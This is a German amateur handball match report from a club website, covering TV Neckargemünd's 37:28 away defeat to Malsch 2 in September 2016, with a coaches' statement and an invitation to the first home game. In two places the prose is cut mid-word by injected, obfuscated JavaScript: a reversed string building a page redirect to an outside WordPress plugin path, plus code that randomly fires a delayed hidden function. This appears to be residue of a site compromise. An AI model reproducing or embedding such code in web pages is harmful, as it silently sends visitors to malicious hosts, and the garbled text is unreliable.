1. Männer: Bericht zum Saisonauftakt

Spielbericht zum Saisonauftakt 25. September 2016

TSV Germania Malsch 2   37 : 28  (17 : 13) TV Neckargemünd 

Sonntagabend, 18:15, wurde die Auswärtspartie gegen Malsch2 angepfiffen. Trotz einiger Ausfälle war die Bank gut besetzt und voller Elan. Bis datoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, wurde auf Grund von Urlaub und absagen nur 2 Trainingsspiele absolviert. So hatte eine neue Mannschaft die Aufgabe ins Spiel zu finden.

In der ersten Halbzeit kamen die Gegner aus Malsch zunächst nur holprig ins Spiel. Am Willen fehlte es ihnen allerdings nicht, sie stießen auf die Nahtstellen und erzwangen dadurch immer wieder kritische Entscheidungen der Schiedsrichter. So kam es in der ersten Viertelstunde zu sechs 7-m Entscheidungen gegen die Gäste aus Neckargemünd.

Auf der anderen Seite waren die Neckargemünder bestrebt ihre einstudierten  Auslösehandlungen ruhig aufzuspielen und technische Fehler zu vermeiden. Oft gelang das mit Erfolg, doch fehlte im Abschluss die nötige Präzision.

Rasch zeigte sich, dass von Malsch vor allem Tempo zu erwarten war. Zweimal mussten die Offiziellen – sehr zum Betrüben der Fans – die Mannschaft wieder an die Mittellinie zurückpfeifen.  Auch so wurden die offiziellen scheinbar stark gefordert:  Auf Seiten des TVN gab es insgesamt 5 Zeitstrafen und 10 Siebenmeterentscheidungen und auf der anderen Seite 9 Zeitstrafen und 3 Siebenmeterentscheidungen. Glücklicherweise kam das Spiel ohne die rote Karte aus.

Halbzeitstand 17:13.

Im zweiten Durchgang zeigte sich die Abgeklärtheit dann deutlich. Wurde vorne der Wurf vergeben, erfolgte prompt die Bestrafung durch Kontertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore. Auch wenn man sich bemühte sich wieder heran zu kämpfen, gelang es den Gästen, in der Abwehr einen Verbund herzustellen. Gepaart mit vielen Tempogegenstößen und der löchrigen Abwehr, welche mehr an einen deftigen schweizer Käse erninnerte, erklärt sich so die Auswärtsniederlage der Neckargemünder.

Statement des Trainergespann:

„Mit 28 Toren steht man eigentlich gut dar, bedenkt man die vielen vergebenen Chancen, doch mit 37 Gegentreffern, muss man nicht viel analysieren. Abwehrarbeit ist Willenssache und wenn dann noch Nervosität dazu kommt erklärt genau dieses den Endstand.

Das Team hatte sich in einigem umstellen müssen und dies muss wachsen. Wir haben keinen Druck, wir bauen auf, und vor allem haben wir Spaß im Training, mit einer sehr guten Trainingsbeteiligung mit einem Mix aus A Jugend sowie Team 2 und das ist das Fundament, wenn wir zukünftig erfolgreich sein wollen.

Im ersten Heimspiel  am Sonntag, 02.10.2016, 18:30 geht es gegen die alten Bekannten aus Dielheim, die ebenfalls mit viel Tempo spielen und sich nicht scheuen da hinzugehen, wo es weh tut.

Das Team des TVN hat bis dahin noch ein paar Schritte zu gehen. Gezeigt hat sich aber auch, dass einige Spieler, unter Druck, über sich hinauswachsen können.

Am Sonntag werden Ab 13 Uhr unsere Mannschaften vorgestellt. Für das leibliche Wohl ist bestens gesorgt.

Auf Ihren Besuch, liebe Handballfreunde und Gönner, würden wir uns sehr freuen.